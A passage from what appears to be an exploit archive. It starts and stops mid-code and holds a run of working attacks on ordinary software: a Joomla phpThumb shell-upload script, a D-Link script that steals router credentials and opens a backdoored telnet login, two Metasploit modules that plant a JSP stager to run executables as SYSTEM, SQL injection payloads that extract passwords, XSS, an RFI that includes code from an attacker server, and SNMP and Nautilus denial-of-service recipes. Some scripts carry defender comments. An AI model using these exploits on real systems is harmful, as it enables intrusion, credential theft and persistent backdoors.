\n"; sleep(1.4); } else { print "[-] Exploit sent but probably the website is not vulnerable. \n"; sleep(1.3); } print "[*] Checking if the txt shell has been uploaded...\n"; sleep(1.2); $cwebsite = "$target/components/com_alphacontent/assets/phpThumb/shell.txt"; $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { print "[+] Txt Shell uploaded :) \n"; sleep(1); print "[*] Moving it to PHP format... Please wait... \n"; sleep(1.1); $mvwebsite = "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php? src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv shell.txt shell.php ; &phpThumbDebug=9"; $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); $cwebsite = "$target/components/com_alphacontent/assets/phpThumb/shell.php"; $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success) { print "[+] PHP Shell uploaded => $cwebsite :) \n"; sleep(0.8); print "[*] Do you want to open it? (y/n) => "; $open = <STDIN>; if ($open == "y") { $firefox = "firefox $cwebsite"; system($firefox); } } else { print "[-] Error while moving shell from txt to PHP :( \n"; exit(1); } } else { print "[-] Txt shell not uploaded. :( \n"; }
-
D-Link DIR-Series Routers - '/model/__show_info.php' Local File Disclosure
source: https://www.securityfocus.com/bid/64043/info Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks.
#!/bin/sh
# PoC for BID 64043: the REQUIRE_FILE parameter of /model/__show_info.php is
# used to read files from the router's filesystem.  $1 is the router address,
# $2 an optional telnet port (defaults to 3333 below).
# Defender notes, based only on what this script does:
#  - a GET to /model/__show_info.php whose REQUIRE_FILE is an absolute path
#    (/var/etc/httpasswd, /etc/ppp/chap-secrets here) is the disclosure itself;
#  - a tools_system.xgi request carrying an "exeshell=" parameter that starts
#    with "../" is the follow-on command execution;
#  - until a firmware fix is applied (status not stated on this page), keep the
#    web UI unreachable from untrusted interfaces.
if [ -z "$1" ]; then
  # No router address given: print affected models and usage, then exit.
  echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
  echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
  echo "usage: $0 [router address] [telnet port]";
  exit 0;
fi;
# TPORT is the port the router is later asked to start telnetd on.
if [ -z "$2" ]; then
  TPORT=3333;
else
  TPORT=$2;
fi
# UPORT is only opened in the firewall below; nothing in this script uses it otherwise.
UPORT=31337;
echo "Trying $1 ...";
# Read /var/etc/httpasswd through the disclosure bug; the sed turns the
# "user:pass" line into two space-separated fields.
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;
if [ ! -z "$HTTPASSWD" ]; then
  L=`echo $HTTPASSWD | cut -d' ' -f1`;
  P=`echo $HTTPASSWD | cut -d' ' -f2`;
  echo "found username: $L";
  echo "found password: $P";
  # Log in with the recovered credentials; a "fail" in the response means rejected.
  curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail" 1>/dev/null;
  if [ $? -eq 0 ]; then
    # Authenticated: the "exeshell" parameter of tools_system.xgi runs the named
    # binary on the router (two firewall rules, then telnetd with a fixed login).
    curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
    curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
    curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;
    echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
    curl -sS "http://$1/logout.php"; 1>/dev/null;
  fi
fi
# Second read through the same bug: PPP credentials.
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "<center>" | sed -e "s/<center>//g"`;
if [ ! -z "$CHAP" ]; then
  echo "found chap-secrets: $CHAP";
fi
echo "Bye bye.";
exit 0;
-
WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting
* Exploit Title: WordPress Users Ultra Plugin [Persistent XSS] * Discovery Date: 2015/10/20 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://usersultra.com * Software Link: https://wordpress.org/plugins/users-ultra/ * Version: 1.5.50 * Tested on: WordPress 4.3.1 * Category: webapps Description ======================================================================== ======== Once a user is registered, they can add new subscription packages or modify existing ones. No data sanitization takes place before the package details are saved to the database. This allows a malicious user to include JavaScript in the package name and/or package description. PoC ======================================================================== ======== - - Send a POST request to `http://vuln.site.tld/wp-admin/admin-ajax.php` with data: `action=package_add_new&p_name=a<script>alert(1)</script>` - - Visit `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership` as admin, or go to the front-end page that shows the package information. Timeline ======================================================================== ======== 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via the contact form on their website 2015/11/13 - Vendor notified via the support forums at wordpress.org 2015/11/14 - Vendor responded and received the report through email Solution ======================================================================== ======== No official solution yet exists.
-
Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service
source: https://www.securityfocus.com/bid/64048/info Net-SNMP is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the SNMPD to crash, exhaust CPU resources or trigger infinite loop; denying service to legitimate users. Net-SNMP 5.7.1 is vulnerable; other versions may also be affected.
#!/bin/sh
# PoC for BID 64048: sends GETNEXT requests against the NET-SNMP enterprise
# subtree (.1.3.6.1.4.1.8072.2) in an endless loop.  $1 is the agent to query;
# the community string is hard-coded to "public" over SNMPv1.
# Defender note: one source repeatedly issuing multi-OID GETNEXTs into
# 1.3.6.1.4.1.8072.2 with v1/"public" is easy to spot in agent logs.  The title
# above attributes the crash/CPU exhaustion to AgentX subagent timeouts, so the
# practical mitigations are restricting which hosts may query the agent and not
# using a guessable community.
SNMPOPTS="-v1 -c public"
LUCKYSNMPD=$1
# SNMPWALKCMD and SNMPGETCMD are defined but never used below.
SNMPWALKCMD="snmpwalk $SNMPOPTS $LUCKYSNMPD"
SNMPGETCMD="snmpget $SNMPOPTS $LUCKYSNMPD"
SNMPGETNEXTCMD="snmpgetnext $SNMPOPTS $LUCKYSNMPD"
TESTMIB=.1.3.6.1.4.1.8072.2
TESTTELEM=$TESTMIB.5
TESTHDD=$TESTMIB.1.1.2
# Never terminates on its own; the OID lists repeat the same instances several times.
while true
do
  $SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.4.2 $TESTTELEM.1.1.4.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.5 $TESTTELEM.1.1.2.3 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.1 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1
  $SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.7.1 $TESTTELEM.1.1.2.1
  # $i is unused; this only repeats the third request three times per outer iteration.
  for i in 1 2 3
  do
    $SNMPGETNEXTCMD $TESTTELEM.1.1.3 $TESTTELEM.1.1.2 $TESTTELEM.1.1.4 $TESTTELEM.1.1.2 $TESTHDD.4 $TESTHDD.5 $TESTHDD.7 $TESTHDD.5 $TESTHDD.2 $TESTHDD.1 $TESTHDD.4 $TESTHDD.1 $TESTHDD.7 $TESTHDD.1 $TESTHDD.8 $TESTHDD.1 $TESTHDD.14 $TESTHDD.1 $TESTHDD.13 $TESTHDD.1
  done
done
-
WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection
* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection] * Discovery Date: 2015/10/19 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://usersultra.com * Software Link: https://wordpress.org/plugins/users-ultra/ * Version: 1.5.50 * Tested on: WordPress 4.3.1 * Category: webapps Description ======================================================================== One can perform an SQL injection attack simply by exploiting the following WP ajax actions: 1. `edit_video` 2. `delete_photo` 3. `delete_gallery` 4. `delete_video` 5. `reload_photos` 6. `edit_gallery` 7. `edit_gallery_confirm` 8. `edit_photo` 9. `edit_photo_confirm` 10. `edit_video_confirm` 11. `set_as_main_photo` 12. `sort_photo_list` 13. `sort_gallery_list` 14. `reload_videos` The POST parameters that are exploitable in each action, respectively, are: 1. `video_id` 2. `photo_id` 3. `gal_id` 4. `video_id` 5. `gal_id` 6. `gal_id` 7. `gal_id` 8. `photo_id` 9. `photo_id` 10. `video_id` 11. `photo_id`, `gal_id` 12. `order` 13. `order` 14. `video_id` In case #7 a user can also change the gallery name, description and visibility by setting the POST parameters `gal_name`, `gal_desc` and `gal_visibility` respectively. In case #8 `photo_id` is first cast to an integer and a query to the DB is performed. If results are returned, then for each result a new query is performed without casting `photo_id` to an integer. So if an attacker knows a valid video id, they can perform the attack in the second query. This is achievable because `<?php (int)'1 and sleep(5)' === 1; ?>` In case #9 a user can also change the photo name, description, tags and category by setting the POST parameters `photo_name`, `photo_desc`, `photo_tags` and `photo_category` respectively. In case #10 a user can also change the video name, unique id and type by setting the POST parameters `video_name`, `video_unique_id` and `video_type` respectively.
Because the functions wpdb::get_results() and wpdb::query() are in use here, only one SQL statement can be made per request. This keeps the severity of the attack low. In addition, all actions are privileged, so the user must have an active account on the vulnerable website in order to perform the attack. PoC ======================================================================== Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=edit_video&video_id=1 and sleep(5) ` Timeline ======================================================================== 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via the contact form on their website 2015/11/13 - Vendor notified via the support forums at wordpress.org 2015/11/14 - Vendor responded and received the report through email 2015/12/08 - Vendor provided new version 1.5.63, which resolves these issues Solution ======================================================================== Upgrade to version 1.5.63
-
Gnome Nautilus 3.16 - Denial of Service
* Exploit Title: Gnome Nautilus [Denial of Service] * Discovery Date: 2015/10/27 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: https://www.gnome.org/ * Software Link: https://wiki.gnome.org/Apps/Nautilus * Version: 3.16 * Tested on: Ubuntu 14.04, Fedora 22 Description ======================================================================== ======== Gnome Nautilus <= v3.16 is vulnerable to a DoS attack through a maliciously crafted file. Details - ------------------------------------------------------------------------ - -------- A maliciously crafted file can be used to perform a DoS attack on Nautilus. The attacker must have local access to the affected system or convince the victim to download the file (email, web URL, etc.). The next time the victim opens the directory that contains the malicious file, Nautilus crashes without warning. The file must have a `.jp2` extension and start with the JPEG signature (`0xFFD8`). Additional Notes - ------------------------------------------------------------------------ - -------- This seems to happen every time Nautilus tries to update the thumbnail of the file. On Ubuntu and Fedora the process dies with the message: ``` Premature end of JPEG file JPEG datastream contains no image ``` This vulnerability seems to affect all Nautilus versions prior to 3.16. PoC ======================================================================== ======== 1. Create a file without a `.jp2` extension on an affected system 2. Open the file in a hex editor so that it starts with the JPEG signature (`0xFFD8`) 3. Rename the file so it has the `.jp2` extension 4. Open the directory with Nautilus 5. Nautilus dies without warning Timeline ======================================================================== ======== 2015/10/27 - Discovered 2015/10/29 - Vendor notified at security@gnome.org Solution ======================================================================== ======== No official solution yet exists. Work-around - ------------------------------------------------------------------------ - -------- Disabling thumbnail generation for all files, through the Nautilus options, will prevent Nautilus from crashing.
-
Oracle BeeHive 2 - 'voice-servlet processEvaluation()' Write File (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Oracle BeeHive 2 voice-servlet processEvaluation() file write (CVE-2010-4417, ZDI-11-020).
# Flow as implemented below: an unauthenticated GET to showRecxml.jsp writes a JSP
# stager through a "..\"-prefixed, NUL-terminated "recxml" name; a POST to that
# stager then hands it an executable which it writes to disk and runs.
# Defender notes grounded in this module: GET requests to
# /voice-servlet/prompt-qa/showRecxml.jsp whose "recxml" value contains "..\" or
# "%00", new .jsp files appearing under the prompt-qa directory, and executables
# launched from the j2ee home directory (see the path comments in #exploit) are
# the observable artefacts.  The Oracle CPU referenced below carries the fix.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata; RPORT defaults to 7777 and TARGETURI to the server root.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",
      'Description' => %q{ This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM. },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          '1c239c43f521145fa8385d64a9c32243', # Found the vuln first
          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC)
          'sinn3r' # Metasploit
        ],
      'References' =>
        [
          [ 'CVE', '2010-4417' ],
          [ 'ZDI', '11-020' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 7777
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Oracle Beehive 2', {}]
        ],
      'Privileged' => true,
      'DisclosureDate' => 'Jun 09 2010',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
      ], self.class)
  end

  # Fingerprints the target by fetching showRecxml.jsp and looking for its title text.
  # NOTE(review): a nil response (timeout) falls through to Safe here; the sibling
  # prepareAudioToPlay module returns Unknown in that case, which is the more honest answer.
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp'))
    if res && /RECXML Prompt Tester/ === res.body
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Aborts unless #check found the page, then uploads the stager and the payload.
  # The stager path is registered with FileDropper so the session can remove it.
  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive')
    end

    # Init some names
    exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
    stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    print_status("Stager name is: #{stager_name}")
    print_status("Executable name is: #{exe_name}")

    # pwd:
    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home
    # Targeted path:
    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa
    register_files_for_cleanup( "../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}" )

    # Ok fire!
    print_status("Uploading stager...")
    res = upload_stager(stager_name, exe_name)

    # Hmm if we fail to upload the stager, no point to continue.
    unless res
      fail_with(Failure::Unknown, 'Connection timed out.')
    end

    print_status("Uploading payload...")
    upload_payload(stager_name)
  end

  # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
  # Returns the JSP source flattened and URI-encoded so it fits in a GET parameter.
  # What the JSP does: reads the raw request body, writes it to exe_name in the
  # servlet's working directory and executes it.  Anyone who can POST to the
  # stager can do the same, hence the cleanup registration in #exploit.
  def get_jsp_stager(exe_name)
    jsp = %Q|<%@ page import="java.io.*" %> <% ByteArrayOutputStream buf = new ByteArrayOutputStream(); BufferedReader reader = request.getReader(); int tmp; while ((tmp = reader.read()) != -1) { buf.write(tmp); } FileOutputStream fostream = new FileOutputStream("#{exe_name}"); buf.writeTo(fostream); fostream.close(); Runtime.getRuntime().exec("#{exe_name}"); %>|

    # Since we're sending it as a GET request, we want to keep it smaller so
    # we gsub stuff we don't want.
    jsp.gsub!("\n", '')
    # NOTE(review): as rendered here both arguments are a single space, so this
    # call is a no-op; upstream presumably collapses runs of spaces — verify.
    jsp.gsub!(' ', ' ')
    Rex::Text.uri_encode(jsp)
  end

  # Stager will be found under:
  # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa\
  # Sends the stager as the "evaluation" GET parameter of showRecxml.jsp; returns
  # the HTTP response (nil on timeout, which #exploit treats as fatal).
  def upload_stager(stager_name, exe_name)
    jsp_stager = get_jsp_stager(exe_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')
    send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'encode_params' => false, # Don't encode %00 for us
      'vars_get' => {
        'evaluation' => jsp_stager,
        'recxml' => "..\\#{stager_name}%00"
      }
    })
  end

  # Payload will be found under:
  # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home\
  # POSTs the generated executable as the raw body to the stager written above.
  def upload_payload(stager_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'data' => generate_payload_exe(code: payload.encoded)
    })
  end

  # Prefixes every status line with host:port.
  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end
end
-
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
Advisory ID: HTB23275 Product: Gwolle Guestbook WordPress Plugin Vendor: Marcel Pol Vulnerable Version(s): 1.5.3 and probably prior Tested Version: 1.5.3 Advisory Publication: October 14, 2015 [without technical details] Vendor Notification: October 14, 2015 Vendor Patch: October 16, 2015 Public Disclosure: November 4, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8351 Risk Level: Critical CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in the Gwolle Guestbook WordPress plugin, which can be exploited by a non-authenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system. The HTTP GET parameter "abspath" is not properly sanitized before being used in the PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. To do so, the attacker needs to place a malicious 'wp-load.php' file in the document root of a server they control and pass that server's URL in the request: http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website] In order to exploit this vulnerability via a remote URL, 'allow_url_include' must be set to 1. Otherwise, an attacker may still include local files and also execute arbitrary code. Successful exploitation of this vulnerability will lead to compromise of the entire WordPress installation, and may even lead to compromise of the entire web server.
----------------------------------------------------------------------------------------------- Solution: Update to Gwolle Guestbook 1.5.4 More Information: https://wordpress.org/plugins/gwolle-gb/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin. [2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
-
Oracle BeeHive 2 - 'voice-servlet prepareAudioToPlay()' Arbitrary File Upload (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Oracle BeeHive 2 voice-servlet prepareAudioToPlay() arbitrary file upload (ZDI-15-550).
# Flow as implemented below: an unauthenticated POST to playAudioFile.jsp writes a
# JSP stager through a "..\"-prefixed, NUL-terminated "sess" value; a POST to that
# stager then hands it an executable which it writes to disk and runs.
# Defender notes grounded in this module: POST requests to
# /voice-servlet/prompt-qa/playAudioFile.jsp whose "sess" field contains "..\" or
# "%00", new .jsp files appearing under the prompt-qa directory, and executables
# launched from the j2ee application directories are the observable artefacts.
# The Oracle CPU referenced below carries the fix.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata; RPORT defaults to 7777 and TARGETURI to the server root.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
      'Description' => %q{ This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM. Authentication is not required to exploit this vulnerability. },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC
          'sinn3r' # MSF module
        ],
      'References' =>
        [
          [ 'ZDI', '15-550'],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 7777
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Oracle Beehive 2', {}]
        ],
      'Privileged' => true,
      'DisclosureDate' => "Nov 10 2015",
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
      ], self.class)
  end

  # Presence probe: any 200 or 403 on the prompt-qa directory counts as Detected,
  # so this confirms the servlet exists, not that it is unpatched.
  # Returns Unknown on a timed-out request rather than Safe.
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/'))
    if res.nil?
      vprint_error("Connection timed out.")
      return Exploit::CheckCode::Unknown
    elsif res && (res.code == 403 || res.code == 200)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Aborts unless #check found the servlet, then uploads the stager and the payload.
  # The stager path is registered with FileDropper so the session can remove it.
  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet')
    end

    # Init some names
    # We will upload to:
    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\
    exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
    stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    print_status("Stager name is: #{stager_name}")
    print_status("Executable name is: #{exe_name}")
    register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}")

    # Ok fire!
    print_status("Uploading stager...")
    res = upload_stager(stager_name, exe_name)

    # Hmm if we fail to upload the stager, no point to continue.
    unless res
      fail_with(Failure::Unknown, 'Connection timed out.')
    end

    print_status("Uploading payload...")
    upload_payload(stager_name)
  end

  # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
  # Returns the JSP source flattened and URI-encoded.
  # What the JSP does: reads the raw request body, writes it to exe_name in the
  # servlet's working directory and executes it.  Anyone who can POST to the
  # stager can do the same, hence the cleanup registration in #exploit.
  def get_jsp_stager(exe_name)
    jsp = %Q|<%@ page import="java.io.*" %> <% ByteArrayOutputStream buf = new ByteArrayOutputStream(); BufferedReader reader = request.getReader(); int tmp; while ((tmp = reader.read()) != -1) { buf.write(tmp); } FileOutputStream fostream = new FileOutputStream("#{exe_name}"); buf.writeTo(fostream); fostream.close(); Runtime.getRuntime().exec("#{exe_name}"); %>|

    # Since we're sending it as a GET request, we want to keep it smaller so
    # we gsub stuff we don't want.
    # NOTE(review): the comment above is inherited from the GET-based sibling
    # module; this module sends the stager in a POST body (see #upload_stager).
    jsp.gsub!("\n", '')
    # NOTE(review): as rendered here both arguments are a single space, so this
    # call is a no-op; upstream presumably collapses runs of spaces — verify.
    jsp.gsub!(' ', ' ')
    Rex::Text.uri_encode(jsp)
  end

  # POSTs the stager to playAudioFile.jsp; "sess" carries the traversal name,
  # "recxml" the stager body, the remaining fields are filler.  Returns the HTTP
  # response (nil on timeout, which #exploit treats as fatal).
  def upload_stager(stager_name, exe_name)
    # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug)
    jsp_stager = get_jsp_stager(exe_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp')
    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'encode_params' => false, # Don't encode %00 for us
      'vars_post' => {
        'sess' => "..\\#{stager_name}%00",
        'recxml' => jsp_stager,
        'audiopath' => Rex::Text.rand_text_alpha(1),
        'wavfile' => "#{Rex::Text.rand_text_alpha(5)}.wav",
        'evaluation' => Rex::Text.rand_text_alpha(1)
      }
    })
  end

  # POSTs the generated executable as the raw body to the stager written above.
  def upload_payload(stager_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'data' => generate_payload_exe(code: payload.encoded)
    })
  end

  # Prefixes every status line with host:port.
  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end
end
-
Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)
##################################################################################### Application: Malwarebytes Antivirus Platforms: Windows Versions: 2.2.0. CVE: No CVE has been assigned Author: Francis Provencher of COSIG Twitter: @COSIG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS X operating systems that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. (http://www.oracle.com/us/technologies/embedded/025613.htm) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-11-28: Francis Provencher of COSIG found the issue; 2015-11-30: Francis Provencher of COSIG reported the vulnerability to Malwarebytes; 2015-12-02: Malwarebytes released a patch for this issue; ##################################################################################### ============================ 3) Technical details ============================ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” field of the UPX section is parsed by Malwarebytes, memory corruption occurs. Successful exploitation of the vulnerability may allow execution of arbitrary code. ##################################################################################### =========== 4) POC https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38858.exe
-
Enorth Webpublisher CMS - 'thisday' SQL Injection
source: https://www.securityfocus.com/bid/64110/info Enorth Webpublisher is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. POST /pub/m_worklog/log_searchday.jsp HTTP/1.1 Host: www.example.com User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn Accept-Encoding: gzip, deflate Cookie: Pragma: no-cache Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 180 thisday=20131012') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype=
-
NeoBill - '/modules/nullregistrar/PHPwhois/example.php?query' Remote Code Execution
source: https://www.securityfocus.com/bid/64112/info NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. NeoBill 0.9-alpha is vulnerable; other versions may also be affected.
// PoC request for BID 64112: the "query" parameter of the bundled PHPwhois
// example.php is where the [CMD] placeholder goes, i.e. the advisory's
// "execute arbitrary commands" item.  No session or credential is sent.
// Defender note: requests to modules/nullregistrar/phpwhois/example.php with a
// "query" value that is not a plain domain/host name are the thing to alert on;
// the script is presumably a vendor sample rather than a feature, so removing it
